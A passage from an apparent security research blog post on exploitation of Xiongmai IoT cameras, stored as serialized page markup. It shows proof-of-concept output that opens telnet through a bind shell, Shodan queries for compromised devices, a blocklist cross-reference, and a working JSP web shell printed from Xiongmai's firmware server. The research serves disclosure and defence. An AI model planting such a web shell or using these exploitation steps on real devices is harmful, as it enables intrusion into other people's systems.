strerror",[1373,117352,1384],{"class":1383},[1373,117354,35613],{"class":1397},[1373,117356,117193],{"class":63570},[1373,117358,4680],{"class":1383},[1373,117360,117361,117364,117366,117368,117371,117374,117376,117378,117381,117384,117386,117388,117390],{"class":1375,"line":4835},[1373,117362,117363],{"class":7297},"        printf",[1373,117365,1384],{"class":1383},[1373,117367,183],{"class":1387},[1373,117369,117370],{"class":2326},"\\x1b",[1373,117372,117373],{"class":1391},"[34mDebug R: Open Failed: ",[1373,117375,38048],{"class":37971},[1373,117377,16090],{"class":1391},[1373,117379,117380],{"class":2326},"\\n\\x1b",[1373,117382,117383],{"class":1391},"[0m",[1373,117385,183],{"class":1387},[1373,117387,5437],{"class":1383},[1373,117389,117205],{"class":63570},[1373,117391,4680],{"class":1383},[1373,117393,117394,117397,117399,117402,117405],{"class":1375,"line":4843},[1373,117395,117396],{"class":63570},"        uVar3 ",[1373,117398,5417],{"class":1397},[1373,117400,117401],{"class":5387}," 0x",[1373,117403,117404],{"class":5467},"ffffffff",[1373,117406,4912],{"class":1383},[1373,117408,117409],{"class":1375,"line":4849},[1373,117410,4795],{"class":1383},[1373,117412,117413,117415],{"class":1375,"line":4877},[1373,117414,7643],{"class":4636},[1373,117416,4765],{"class":1383},[1373,117418,117419,117422,117424,117426],{"class":1375,"line":4915},[1373,117420,117421],{"class":7297},"        pclose",[1373,117423,1384],{"class":1383},[1373,117425,117181],{"class":63570},[1373,117427,4680],{"class":1383},[1373,117429,117430,117433],{"class":1375,"line":4931},[1373,117431,117432],{"class":7297},"        
FUN_003f1588",[1373,117434,15603],{"class":1383},[1373,117436,117437,117439,117441,117443],{"class":1375,"line":4947},[1373,117438,117396],{"class":63570},[1373,117440,5417],{"class":1397},[1373,117442,5557],{"class":5467},[1373,117444,4912],{"class":1383},[1373,117446,117447],{"class":1375,"line":4952},[1373,117448,4795],{"class":1383},[1373,117450,117451,117453,117456],{"class":1375,"line":6776},[1373,117452,7340],{"class":4636},[1373,117454,117455],{"class":63570}," uVar3",[1373,117457,4912],{"class":1383},[1373,117459,117460],{"class":1375,"line":6781},[1373,117461,1855],{"class":1383},[18,117463,117464,117465,117468,117469,117471,117472,117474,117475,117477,117478,117480,117481,117483],{},"This function actually shows another Xiongmai curiosity. See the weird ",[886,117466,117467],{},"%X"," after ",[886,117470,1055],{}," in the ",[886,117473,39226],{}," call? This is to accommodate an alteration this firmware version has in busybox. The updated busybox will check for a special value on the command line when ",[886,117476,1055],{}," is invoked. If the correct value isn’t present then ",[886,117479,1055],{}," won’t start. Presumably, this is an attempt by Xiongmai to stop the ",[886,117482,1055],{},"-based attacks that have plagued their devices. 
Fortunately for us, this function (which is very poorly decompiled by Ghidra) will calculate the value for us.",[18,117485,117486],{},"Here is the output for a proof of concept we wrote that opens telnet using this function.",[1354,117488,117491],{"className":117489,"code":117490,"language":1359},[1357],"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2022-26259$ telnet 10.12.70.218\nTrying 10.12.70.218...\ntelnet: Unable to connect to remote host: Connection refused\nalbinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2022-26259$ .\u002Fbuild\u002Fcve-2022-26259-linux_arm64 -e -rhost 10.12.70.218\n[+] Sending a bind shell for port 23\n[+] Connecting to 10.12.70.218:554\n[+] Connected to 10.12.70.218:23!\n[+] Done!\nalbinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2022-26259$ telnet 10.12.70.218\nTrying 10.12.70.218...\nConnected to 10.12.70.218.\nEscape character is '^]'.\nLogin incorrect\nLocalHost login:\n",[886,117492,117490],{"__ignoreMap":219},[18,117494,117495,117496,117498],{},"This ",[886,117497,1055],{}," debug logic doesn’t appear to be available in all affected systems. Which means, as Leech indicated in his write up, exploitation of CVE-2022-26259 in the wild is going to be a little messy. Different firmware will require different exploitation methods. 
Attackers will need to figure out a version fingerprinting method, or just be patient as the box reboots 2 minutes after every crash.",[61,117500,117502],{"id":117501},"scale-of-xiongmai-exploitation","Scale of Xiongmai Exploitation",[18,117504,117505,117506,1246,117509,1246,117513,117517,117518,117521],{},"Although we haven’t touched on all of these, we know ",[47,117507,81767],{"href":116790,"rel":117508},[51],[47,117510,115722],{"href":117511,"rel":117512},"https:\u002F\u002Fviz.greynoise.io\u002Ftag\u002Fhisilicon-backdoor-access-attempt?days=30",[51],[47,117514,106686],{"href":117515,"rel":117516},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=port%3A9527+%2B%22%27+is+not+a+command.%22",[51],", and CVE-2022-45045 are all being actively targeted ",[1131,117519,117520],{},"right now",". We can verify that via Greynoise, Shodan, or our own honeypots. The question is, “At what scale?”",[18,117523,117524,117525,117530],{},"It’s a difficult question to answer. But we can get some ideas. In ",[47,117526,117529],{"href":117527,"rel":117528},"https:\u002F\u002Fscholar.google.com\u002Fcitations?user=I35Lgl4AAAAJ&hl=en",[51],"Troy Mursch’s",", “Identifying infected energy systems in the wild”, Troy cross referenced known malicious endpoints (from Greynoise, honeypots, and IP blocklists) against a Censys scan of ICS endpoints. The overlapping IP addresses, Mursch theorized, are infected\u002Fmalicious ICS systems. The general idea is that when these systems are recruited into a botnet, they themselves will start recruiting others and eventually end up in a malicious endpoint list.",[18,117532,117533,117534,117539],{},"We can do something similar. I grabbed the IP addresses of 200,000 Xiongmai devices from Shodan and cross referenced them against the ",[47,117535,117538],{"href":117536,"rel":117537},"https:\u002F\u002Fiplists.firehol.org\u002F",[51],"FireHOL"," blocklists (with all netblocks removed because that seemed overly broad). Now, FireHOL isn’t perfect. 
In fact, some of the aggregated lists are incredibly old. But some are updated daily. IP blocklists are also notorious for false positives. But the goal is not to be perfect, but to merely get an idea of how many Xiongmai endpoints are considered malicious.",[18,117541,117542],{},"The cross reference generated the following:",[1354,117544,117547],{"className":117545,"code":117546,"language":1359},[1357],"firehol_anonymous.netset: 1185\nfirehol_proxies.netset: 1185\nfirehol_level4.netset: 166\nstopforumspam_365d.ipset: 144\nblocklist_net_ua.ipset: 142\nstopforumspam_180d.ipset: 68\nfirehol_abusers_30d.netset: 57\nstopforumspam.ipset: 45\nstopforumspam_90d.ipset: 45\nhaley_ssh.ipset: 24\nsocks_proxy_30d.ipset: 22\nnixspam.ipset: 14\nvoipbl.netset: 14\nstopforumspam_30d.ipset: 13\nsocks_proxy_7d.ipset: 10\nproxylists_7d.ipset: 9\nproxylists_30d.ipset: 9\nesentire_emptyarray_ru.ipset: 9\nlashback_ubl.ipset: 8\nesentire_dorttlokolrt_com.ipset: 8\nesentire_crazyerror_su.ipset: 8\ncleantalk_30d.ipset: 7\niblocklist_ciarmy_malicious.netset: 7\nfirehol_level3.netset: 7\nesentire_maddox1_ru.ipset: 7\nsblam.ipset: 6\nciarmy.ipset: 6\nproxylists_1d.ipset: 5\nnullsecure.ipset: 5\ncleantalk_new_30d.ipset: 4\nsocks_proxy_1d.ipset: 4\ncleantalk_updated_30d.ipset: 4\nesentire_burmundisoul_ru.ipset: 4\nesentire_22072014c_com.ipset: 3\nesentire_22072014a_com.ipset: 3\nesentire_22072014b_com.ipset: 3\nproxz_30d.ipset: 3\ntaichung.ipset: 3\nesentire_volaya_ru.ipset: 3\nbitcoin_nodes_30d.ipset: 3\npacketmail_ramnode.ipset: 2\nbotscout_30d.ipset: 2\nstopforumspam_7d.ipset: 2\nnormshield_high_wannacry.ipset: 2\nnormshield_all_wannacry.ipset: 2\npacketmail.ipset: 2\ncleantalk_7d.ipset: 2\nproxyspy_30d.ipset: 2\nproxz_7d.ipset: 2\nesentire_downs1_ru.ipset: 2\nesentire_manning1_ru.ipset: 2\nbitcoin_nodes_7d.ipset: 2\nproxylists.ipset: 2\nesentire_inleet_ru.ipset: 2\nesentire_getarohirodrons_com.ipset: 2\ncruzit_web_attacks.ipset: 1\niblocklist_cruzit_web_attacks.netset: 
1\ncleantalk_new_7d.ipset: 1\ncleantalk_updated_7d.ipset: 1\nproxyspy_7d.ipset: 1\nbitcoin_blockchain_info_30d.ipset: 1\ndarklist_de.netset: 1\nesentire_smartfoodsglutenfree_kz.ipset: 1\nbitcoin_nodes_1d.ipset: 1\nbitcoin_nodes.ipset: 1\ncoinbl_hosts.ipset: 1\nhphosts_emd.ipset: 1\nturris_greylist.ipset: 1\nblocklist_de_bruteforce.ipset: 1\nfirehol_level2.netset: 1\nblocklist_de_apache.ipset: 1\nblocklist_de.ipset: 1\nsslproxies_30d.ipset: 1\nesentire_fioartd_com.ipset: 1\nesentire_dagestanskiiviskis_ru.ipset: 1\nesentire_venerologvasan93_ru.ipset: 1\nesentire_hasanhashsde_ru.ipset: 1\nesentire_14072015q_com.ipset: 1\nesentire_mysebstarion_ru.ipset: 1\nesentire_ebankoalalusys_ru.ipset: 1\nesentire_14072015_com.ipset: 1\n",[886,117548,117546],{"__ignoreMap":219},[18,117550,117551,117552,117556],{},"The result is actually quite a bit lower than I had expected. That may be due to the quality of the block list, or exploited endpoints don’t actually recruit others, or the scale of exploitation is on the small side. Regardless, looking over this list did provide one interesting insight. Validating this list, I discovered ",[47,117553,74822],{"href":117554,"rel":117555},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=port%3A9001+%22%2Fvar%22+-HTTP",[51]," Shodan query:",[18,117558,117559],{},[68,117560],{":width":10862,"alt":117561,"src":117562},"exploited_port_9001","\u002Fblog\u002Fxiongmai-iot-exploitation\u002Fexploited_port_9001.png",[18,117564,117565,117566,117568,117569,117571],{},"This query shows devices that have recently been exploited by CVE-2022-45045. As we saw earlier, the attacker opens ",[886,117567,1055],{}," on port 9001 which allows them to begin their stage 2 attack. 
The endpoints listed on Shodan are systems where the attacker has failed to close ",[886,117570,1055],{}," to the rest of the world (or simply haven’t gotten around to it yet).",[61,117573,117575],{"id":117574},"firmware-updates","Firmware Updates",[18,117577,117578,117579,117584,117585,59],{},"IoT systems are notorious for using old firmware. However, internet-facing Xiongmai systems seem to be worse than usual. There are many internet-facing systems using firmware that was released between 2016 and 2019. I believe, in large part, this is because acquiring upgrades isn’t straightforward. For example, as mentioned a few times, I recently purchased a ",[47,117580,117583],{"href":117581,"rel":117582},"https:\u002F\u002Fsunbatech.com\u002Fproduct\u002Fnvr-f8010se\u002F",[51],"Sunba NVR-F8010SE",". The device arrived using firmware from 2019. It has no auto-upgrade feature. The Sunba website doesn’t have a firmware file to download for the device. The NVR’s manual doesn’t mention upgrades. So, without any obvious leads, a normal user probably wouldn’t pursue upgrading the system. A normal user isn’t going to find Xiongmai’s firmware server, especially if they’re using a relabeled device like Sunba. But there is a firmware download site: ",[47,117586,117587],{"href":117587,"rel":117588},"https:\u002F\u002Fbaike.jftech.com\u002Fdownload.html",[51],[18,117590,117591,117592,117597],{},"Xiongmai stores their firmware on ",[47,117593,117596],{"href":117594,"rel":117595},"https:\u002F\u002Fobs-xm-customer.obs.cn-east-2.myhuaweicloud.com\u002F",[51],"myhuaweicloud",". From this site, you can get a full directory listing of all available firmware (a vulnerability analyst’s dream). 
Interestingly, the firmware server is littered with non-firmware files.",[1354,117599,117601],{"className":56326,"code":117600,"language":56328,"meta":219,"style":219},"\u003CContents>\n \u003CKey>vuuzcu.jsp\u002F\u003C\u002FKey>\n \u003CLastModified>2021-01-30T05:23:00.929Z\u003C\u002FLastModified>\n \u003CETag>\"134155a532a368eded42290a2a28bb58\"\u003C\u002FETag>\n \u003CSize>35\u003C\u002FSize>\n \u003COwner>\n  \u003CID>65a011a29cdf8ec533ec3d1ccaae921c\u003C\u002FID>\n  \u003CDisplayName\u002F>\n \u003C\u002FOwner>\n \u003CStorageClass>STANDARD\u003C\u002FStorageClass>\n\u003C\u002FContents>\n\u003CContents>\n \u003CKey>wp-content\u002Fplugins\u002Fw3-total-cache\u002Fpub\u002Fsns.php\u003C\u002FKey>\n \u003CLastModified>2022-04-08T10:26:53.530Z\u003C\u002FLastModified>\n \u003CETag>\"07b9ab8f8dfa1f3f372a44da3f16cbbf\"\u003C\u002FETag>\n \u003CSize>96\u003C\u002FSize>\n \u003COwner>\n  \u003CID>65a011a29cdf8ec533ec3d1ccaae921c\u003C\u002FID>\n  \u003CDisplayName\u002F>\n \u003C\u002FOwner>\n \u003CStorageClass>STANDARD\u003C\u002FStorageClass>\n\u003C\u002FContents>\n\u003CContents>\n \u003CKey>wxzqqi.jsp\u002F\u003C\u002FKey>\n \u003CLastModified>2022-11-18T09:30:45.785Z\u003C\u002FLastModified>\n \u003CETag>\"9d631c65ed74752c7081301986f84fe6\"\u003C\u002FETag>\n \u003CSize>35\u003C\u002FSize>\n \u003COwner>\n  \u003CID>65a011a29cdf8ec533ec3d1ccaae921c\u003C\u002FID>\n  \u003CDisplayName\u002F>\n \u003C\u002FOwner>\n 
\u003CStorageClass>STANDARD\u003C\u002FStorageClass>\n\u003C\u002FContents>\n\u003CContents>\n",[886,117602,117603,117612,117629,117647,117665,117682,117691,117709,117718,117726,117744,117752,117760,117777,117794,117811,117827,117835,117851,117859,117867,117883,117891,117899,117916,117933,117950,117966,117974,117990,117998,118006,118022,118030],{"__ignoreMap":219},[1373,117604,117605,117607,117610],{"class":1375,"line":1376},[1373,117606,11852],{"class":1383},[1373,117608,117609],{"class":6300},"Contents",[1373,117611,6765],{"class":1383},[1373,117613,117614,117616,117618,117620,117623,117625,117627],{"class":1375,"line":220},[1373,117615,27250],{"class":1383},[1373,117617,15996],{"class":6300},[1373,117619,5384],{"class":1383},[1373,117621,117622],{"class":4640},"vuuzcu.jsp\u002F",[1373,117624,46627],{"class":1383},[1373,117626,15996],{"class":6300},[1373,117628,6765],{"class":1383},[1373,117630,117631,117633,117636,117638,117641,117643,117645],{"class":1375,"line":1266},[1373,117632,27250],{"class":1383},[1373,117634,117635],{"class":6300},"LastModified",[1373,117637,5384],{"class":1383},[1373,117639,117640],{"class":4640},"2021-01-30T05:23:00.929Z",[1373,117642,46627],{"class":1383},[1373,117644,117635],{"class":6300},[1373,117646,6765],{"class":1383},[1373,117648,117649,117651,117654,117656,117659,117661,117663],{"class":1375,"line":1852},[1373,117650,27250],{"class":1383},[1373,117652,117653],{"class":6300},"ETag",[1373,117655,5384],{"class":1383},[1373,117657,117658],{"class":4640},"\"134155a532a368eded42290a2a28bb58\"",[1373,117660,46627],{"class":1383},[1373,117662,117653],{"class":6300},[1373,117664,6765],{"class":1383},[1373,117666,117667,117669,117672,117674,117676,117678,117680],{"class":1375,"line":4692},[1373,117668,27250],{"class":1383},[1373,117670,117671],{"class":6300},"Size",[1373,117673,5384],{"class":1383},[1373,117675,68450],{"class":4640},[1373,117677,46627],{"class":1383},[1373,117679,117671],{"class":6300},[1373,117681,6765],{"class":1383},[
1373,117683,117684,117686,117689],{"class":1375,"line":4724},[1373,117685,27250],{"class":1383},[1373,117687,117688],{"class":6300},"Owner",[1373,117690,6765],{"class":1383},[1373,117692,117693,117695,117698,117700,117703,117705,117707],{"class":1375,"line":4756},[1373,117694,48971],{"class":1383},[1373,117696,117697],{"class":6300},"ID",[1373,117699,5384],{"class":1383},[1373,117701,117702],{"class":4640},"65a011a29cdf8ec533ec3d1ccaae921c",[1373,117704,46627],{"class":1383},[1373,117706,117697],{"class":6300},[1373,117708,6765],{"class":1383},[1373,117710,117711,117713,117716],{"class":1375,"line":4768},[1373,117712,48971],{"class":1383},[1373,117714,117715],{"class":6300},"DisplayName",[1373,117717,85355],{"class":1383},[1373,117719,117720,117722,117724],{"class":1375,"line":4792},[1373,117721,49129],{"class":1383},[1373,117723,117688],{"class":6300},[1373,117725,6765],{"class":1383},[1373,117727,117728,117730,117733,117735,117738,117740,117742],{"class":1375,"line":4798},[1373,117729,27250],{"class":1383},[1373,117731,117732],{"class":6300},"StorageClass",[1373,117734,5384],{"class":1383},[1373,117736,117737],{"class":4640},"STANDARD",[1373,117739,46627],{"class":1383},[1373,117741,117732],{"class":6300},[1373,117743,6765],{"class":1383},[1373,117745,117746,117748,117750],{"class":1375,"line":4806},[1373,117747,46627],{"class":1383},[1373,117749,117609],{"class":6300},[1373,117751,6765],{"class":1383},[1373,117753,117754,117756,117758],{"class":1375,"line":4817},[1373,117755,11852],{"class":1383},[1373,117757,117609],{"class":6300},[1373,117759,6765],{"class":1383},[1373,117761,117762,117764,117766,117768,117771,117773,117775],{"class":1375,"line":4825},[1373,117763,27250],{"class":1383},[1373,117765,15996],{"class":6300},[1373,117767,5384],{"class":1383},[1373,117769,117770],{"class":4640},"wp-content\u002Fplugins\u002Fw3-total-cache\u002Fpub\u002Fsns.php",[1373,117772,46627],{"class":1383},[1373,117774,15996],{"class":6300},[1373,117776,6765],{"class":1383},[13
73,117778,117779,117781,117783,117785,117788,117790,117792],{"class":1375,"line":4835},[1373,117780,27250],{"class":1383},[1373,117782,117635],{"class":6300},[1373,117784,5384],{"class":1383},[1373,117786,117787],{"class":4640},"2022-04-08T10:26:53.530Z",[1373,117789,46627],{"class":1383},[1373,117791,117635],{"class":6300},[1373,117793,6765],{"class":1383},[1373,117795,117796,117798,117800,117802,117805,117807,117809],{"class":1375,"line":4843},[1373,117797,27250],{"class":1383},[1373,117799,117653],{"class":6300},[1373,117801,5384],{"class":1383},[1373,117803,117804],{"class":4640},"\"07b9ab8f8dfa1f3f372a44da3f16cbbf\"",[1373,117806,46627],{"class":1383},[1373,117808,117653],{"class":6300},[1373,117810,6765],{"class":1383},[1373,117812,117813,117815,117817,117819,117821,117823,117825],{"class":1375,"line":4849},[1373,117814,27250],{"class":1383},[1373,117816,117671],{"class":6300},[1373,117818,5384],{"class":1383},[1373,117820,58805],{"class":4640},[1373,117822,46627],{"class":1383},[1373,117824,117671],{"class":6300},[1373,117826,6765],{"class":1383},[1373,117828,117829,117831,117833],{"class":1375,"line":4877},[1373,117830,27250],{"class":1383},[1373,117832,117688],{"class":6300},[1373,117834,6765],{"class":1383},[1373,117836,117837,117839,117841,117843,117845,117847,117849],{"class":1375,"line":4915},[1373,117838,48971],{"class":1383},[1373,117840,117697],{"class":6300},[1373,117842,5384],{"class":1383},[1373,117844,117702],{"class":4640},[1373,117846,46627],{"class":1383},[1373,117848,117697],{"class":6300},[1373,117850,6765],{"class":1383},[1373,117852,117853,117855,117857],{"class":1375,"line":4931},[1373,117854,48971],{"class":1383},[1373,117856,117715],{"class":6300},[1373,117858,85355],{"class":1383},[1373,117860,117861,117863,117865],{"class":1375,"line":4947},[1373,117862,49129],{"class":1383},[1373,117864,117688],{"class":6300},[1373,117866,6765],{"class":1383},[1373,117868,117869,117871,117873,117875,117877,117879,117881],{"class":1375,"line":4952},[1
373,117870,27250],{"class":1383},[1373,117872,117732],{"class":6300},[1373,117874,5384],{"class":1383},[1373,117876,117737],{"class":4640},[1373,117878,46627],{"class":1383},[1373,117880,117732],{"class":6300},[1373,117882,6765],{"class":1383},[1373,117884,117885,117887,117889],{"class":1375,"line":6776},[1373,117886,46627],{"class":1383},[1373,117888,117609],{"class":6300},[1373,117890,6765],{"class":1383},[1373,117892,117893,117895,117897],{"class":1375,"line":6781},[1373,117894,11852],{"class":1383},[1373,117896,117609],{"class":6300},[1373,117898,6765],{"class":1383},[1373,117900,117901,117903,117905,117907,117910,117912,117914],{"class":1375,"line":7524},[1373,117902,27250],{"class":1383},[1373,117904,15996],{"class":6300},[1373,117906,5384],{"class":1383},[1373,117908,117909],{"class":4640},"wxzqqi.jsp\u002F",[1373,117911,46627],{"class":1383},[1373,117913,15996],{"class":6300},[1373,117915,6765],{"class":1383},[1373,117917,117918,117920,117922,117924,117927,117929,117931],{"class":1375,"line":7530},[1373,117919,27250],{"class":1383},[1373,117921,117635],{"class":6300},[1373,117923,5384],{"class":1383},[1373,117925,117926],{"class":4640},"2022-11-18T09:30:45.785Z",[1373,117928,46627],{"class":1383},[1373,117930,117635],{"class":6300},[1373,117932,6765],{"class":1383},[1373,117934,117935,117937,117939,117941,117944,117946,117948],{"class":1375,"line":7546},[1373,117936,27250],{"class":1383},[1373,117938,117653],{"class":6300},[1373,117940,5384],{"class":1383},[1373,117942,117943],{"class":4640},"\"9d631c65ed74752c7081301986f84fe6\"",[1373,117945,46627],{"class":1383},[1373,117947,117653],{"class":6300},[1373,117949,6765],{"class":1383},[1373,117951,117952,117954,117956,117958,117960,117962,117964],{"class":1375,"line":7571},[1373,117953,27250],{"class":1383},[1373,117955,117671],{"class":6300},[1373,117957,5384],{"class":1383},[1373,117959,68450],{"class":4640},[1373,117961,46627],{"class":1383},[1373,117963,117671],{"class":6300},[1373,117965,6765],{"class":13
83},[1373,117967,117968,117970,117972],{"class":1375,"line":7598},[1373,117969,27250],{"class":1383},[1373,117971,117688],{"class":6300},[1373,117973,6765],{"class":1383},[1373,117975,117976,117978,117980,117982,117984,117986,117988],{"class":1375,"line":7615},[1373,117977,48971],{"class":1383},[1373,117979,117697],{"class":6300},[1373,117981,5384],{"class":1383},[1373,117983,117702],{"class":4640},[1373,117985,46627],{"class":1383},[1373,117987,117697],{"class":6300},[1373,117989,6765],{"class":1383},[1373,117991,117992,117994,117996],{"class":1375,"line":7635},[1373,117993,48971],{"class":1383},[1373,117995,117715],{"class":6300},[1373,117997,85355],{"class":1383},[1373,117999,118000,118002,118004],{"class":1375,"line":7640},[1373,118001,49129],{"class":1383},[1373,118003,117688],{"class":6300},[1373,118005,6765],{"class":1383},[1373,118007,118008,118010,118012,118014,118016,118018,118020],{"class":1375,"line":7648},[1373,118009,27250],{"class":1383},[1373,118011,117732],{"class":6300},[1373,118013,5384],{"class":1383},[1373,118015,117737],{"class":4640},[1373,118017,46627],{"class":1383},[1373,118019,117732],{"class":6300},[1373,118021,6765],{"class":1383},[1373,118023,118024,118026,118028],{"class":1375,"line":7672},[1373,118025,46627],{"class":1383},[1373,118027,117609],{"class":6300},[1373,118029,6765],{"class":1383},[1373,118031,118032,118034,118036],{"class":1375,"line":7688},[1373,118033,11852],{"class":1383},[1373,118035,117609],{"class":6300},[1373,118037,6765],{"class":1383},[18,118039,118040,118041,982,118044,118047,118048,118050],{},"Naturally, I was interested in what these files were. It’s a bit odd to find ",[886,118042,118043],{},".php",[886,118045,118046],{},".jsp"," files listed amongst the normal firmware ",[886,118049,94544],{},". 
Examining the file, some appear to be the result of a Nessus scan.",[1354,118052,118055],{"className":118053,"code":118054,"language":1359},[1357],"curl https:\u002F\u002Fobs-xm-customer.obs.cn-east-2.myhuaweicloud.com\u002Fwp-content\u002Fplugins\u002Fw3-total-cache\u002Fpub\u002Fsns.php\n{\"Type\":\"SubscriptionConfirmation\",\"Message\":\"\",\"SubscribeURL\":\"https:\u002F\u002Frfi.nessus.org\u002Frfi.txt\"}\n",[886,118056,118054],{"__ignoreMap":219},[18,118058,118059],{},"Others appear to be broken web shells.",[18,118061,118062],{},[886,118063,118064],{},"curl https:\u002F\u002Fobs-xm-customer.obs.cn-east-2.myhuaweicloud.com\u002Fpoc.jsp\u002F",[1354,118066,118068],{"className":27194,"code":118067,"language":27196,"meta":219,"style":219},"\n\u003C%@ page import=\"java.util.*,java.io.*\"%>\n\u003C%\nif (request.getParameter(\"cmd\") == null) { return }\nout.println(\"Command: \" + request.getParameter(\"cmd\") + \"\u003CBR>\");\nProcess p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\nOutputStream os = p.getOutputStream();\nInputStream in = p.getInputStream();\nDataInputStream dis = new DataInputStream(in);\nString disr = dis.readLine();\nwhile ( disr != null ) {\n  out.println(disr);\n  disr = dis.readLine();\n  }\n}\n\n%>\n",[886,118069,118070,118074,118098,118102,118136,118182,118218,118235,118252,118270,118286,118304,118319,118334,118338,118342,118346],{"__ignoreMap":219},[1373,118071,118072],{"class":1375,"line":1376},[1373,118073,6520],{"emptyLinePlaceholder":237},[1373,118075,118076,118079,118081,118084,118086,118088,118090,118093,118095],{"class":1375,"line":220},[1373,118077,118078],{"class":1397},"\u003C%",[1373,118080,7318],{"class":1383},[1373,118082,118083],{"class":7293}," 
page",[1373,118085,102527],{"class":4640},[1373,118087,5417],{"class":1397},[1373,118089,183],{"class":1387},[1373,118091,118092],{"class":1391},"java.util.*,java.io.*",[1373,118094,183],{"class":1387},[1373,118096,118097],{"class":1397},"%>\n",[1373,118099,118100],{"class":1375,"line":1266},[1373,118101,91287],{"class":1397},[1373,118103,118104,118106,118108,118110,118112,118114,118116,118118,118120,118122,118124,118126,118128,118130,118132,118134],{"class":1375,"line":1852},[1373,118105,4637],{"class":4636},[1373,118107,4641],{"class":1383},[1373,118109,75186],{"class":4640},[1373,118111,59],{"class":1383},[1373,118113,75130],{"class":7297},[1373,118115,1384],{"class":1383},[1373,118117,183],{"class":1387},[1373,118119,17653],{"class":1391},[1373,118121,183],{"class":1387},[1373,118123,2230],{"class":1383},[1373,118125,16406],{"class":1397},[1373,118127,15680],{"class":7054},[1373,118129,2230],{"class":1383},[1373,118131,5420],{"class":1383},[1373,118133,94321],{"class":4636},[1373,118135,35334],{"class":1383},[1373,118137,118138,118140,118142,118144,118146,118148,118151,118153,118155,118157,118159,118161,118163,118165,118167,118169,118171,118173,118175,118178,118180],{"class":1375,"line":4692},[1373,118139,110008],{"class":4640},[1373,118141,59],{"class":1383},[1373,118143,82527],{"class":7297},[1373,118145,1384],{"class":1383},[1373,118147,183],{"class":1387},[1373,118149,118150],{"class":1391},"Command: 
",[1373,118152,183],{"class":1387},[1373,118154,15478],{"class":1397},[1373,118156,75125],{"class":4640},[1373,118158,59],{"class":1383},[1373,118160,75130],{"class":7297},[1373,118162,1384],{"class":1383},[1373,118164,183],{"class":1387},[1373,118166,17653],{"class":1391},[1373,118168,183],{"class":1387},[1373,118170,2230],{"class":1383},[1373,118172,15478],{"class":1397},[1373,118174,4883],{"class":1387},[1373,118176,118177],{"class":1391},"\u003CBR>",[1373,118179,183],{"class":1387},[1373,118181,4680],{"class":1383},[1373,118183,118184,118186,118188,118190,118192,118194,118196,118198,118200,118202,118204,118206,118208,118210,118212,118214,118216],{"class":1375,"line":4724},[1373,118185,17590],{"class":27228},[1373,118187,27886],{"class":4640},[1373,118189,5417],{"class":1397},[1373,118191,27891],{"class":4640},[1373,118193,59],{"class":1383},[1373,118195,27896],{"class":7297},[1373,118197,16355],{"class":1383},[1373,118199,27901],{"class":7297},[1373,118201,1384],{"class":1383},[1373,118203,75186],{"class":4640},[1373,118205,59],{"class":1383},[1373,118207,75130],{"class":7297},[1373,118209,1384],{"class":1383},[1373,118211,183],{"class":1387},[1373,118213,17653],{"class":1391},[1373,118215,183],{"class":1387},[1373,118217,1413],{"class":1383},[1373,118219,118220,118223,118225,118227,118229,118231,118233],{"class":1375,"line":4756},[1373,118221,118222],{"class":27228},"OutputStream",[1373,118224,75257],{"class":4640},[1373,118226,5417],{"class":1397},[1373,118228,75262],{"class":4640},[1373,118230,59],{"class":1383},[1373,118232,75267],{"class":7297},[1373,118234,15603],{"class":1383},[1373,118236,118237,118240,118242,118244,118246,118248,118250],{"class":1375,"line":4768},[1373,118238,118239],{"class":27228},"InputStream",[1373,118241,50864],{"class":4640},[1373,118243,5417],{"class":1397},[1373,118245,75262],{"class":4640},[1373,118247,59],{"class":1383},[1373,118249,75285],{"class":7297},[1373,118251,15603],{"class":1383},[1373,118253,118254,118256,118258,1182
60,118262,118264,118266,118268],{"class":1375,"line":4792},[1373,118255,91342],{"class":27228},[1373,118257,75295],{"class":4640},[1373,118259,5417],{"class":1397},[1373,118261,15283],{"class":4636},[1373,118263,75302],{"class":7297},[1373,118265,1384],{"class":1383},[1373,118267,63776],{"class":4640},[1373,118269,4680],{"class":1383},[1373,118271,118272,118274,118276,118278,118280,118282,118284],{"class":1375,"line":4798},[1373,118273,27524],{"class":27228},[1373,118275,75315],{"class":4640},[1373,118277,5417],{"class":1397},[1373,118279,75320],{"class":4640},[1373,118281,59],{"class":1383},[1373,118283,75325],{"class":7297},[1373,118285,15603],{"class":1383},[1373,118287,118288,118291,118293,118295,118297,118299,118302],{"class":1375,"line":4806},[1373,118289,118290],{"class":4636},"while",[1373,118292,4641],{"class":1383},[1373,118294,75315],{"class":4640},[1373,118296,15677],{"class":1397},[1373,118298,15680],{"class":7054},[1373,118300,118301],{"class":1383}," )",[1373,118303,4765],{"class":1383},[1373,118305,118306,118309,118311,118313,118315,118317],{"class":1375,"line":4817},[1373,118307,118308],{"class":4640},"  out",[1373,118310,59],{"class":1383},[1373,118312,82527],{"class":7297},[1373,118314,1384],{"class":1383},[1373,118316,75360],{"class":4640},[1373,118318,4680],{"class":1383},[1373,118320,118321,118324,118326,118328,118330,118332],{"class":1375,"line":4825},[1373,118322,118323],{"class":4640},"  disr 
",[1373,118325,5417],{"class":1397},[1373,118327,75320],{"class":4640},[1373,118329,59],{"class":1383},[1373,118331,75325],{"class":7297},[1373,118333,15603],{"class":1383},[1373,118335,118336],{"class":1375,"line":4835},[1373,118337,27147],{"class":1383},[1373,118339,118340],{"class":1375,"line":4843},[1373,118341,1855],{"class":4640},[1373,118343,118344],{"class":1375,"line":4849},[1373,118345,6520],{"emptyLinePlaceholder":237},[1373,118347,118348],{"class":1375,"line":4877},[1373,118349,118097],{"class":1397},[18,118351,118352,118353,118356],{},"Neither of which inspires confidence. One “fun” fact about the firmware for these devices is that they lack a digital signature that covers the entire firmware. It’s fairly trivial to introduce malicious content to a “valid” firmware. If an attacker can upload webshells to this firmware server, can they upload malicious firmware? ",[1131,118354,118355],{},"I’ve seen no evidence of this",", and it could be that we’re seeing the results of an authorized Nessus scan. But, like I said, the state of the firmware server doesn’t inspire confidence.",[61,118358,118360],{"id":118359},"conclusion-and-about-vulncheck","Conclusion and About VulnCheck",[18,118362,118363],{},"You might not find Xiongmai vulnerabilities on the CISA Known Exploited Vulnerabilities Catalog, and it might be hard to track down high-quality public exploits for some of these vulnerabilities. But they are being exploited in the wild. And with a couple hundred thousand internet-facing systems, Xiongmai products are of clear value to any 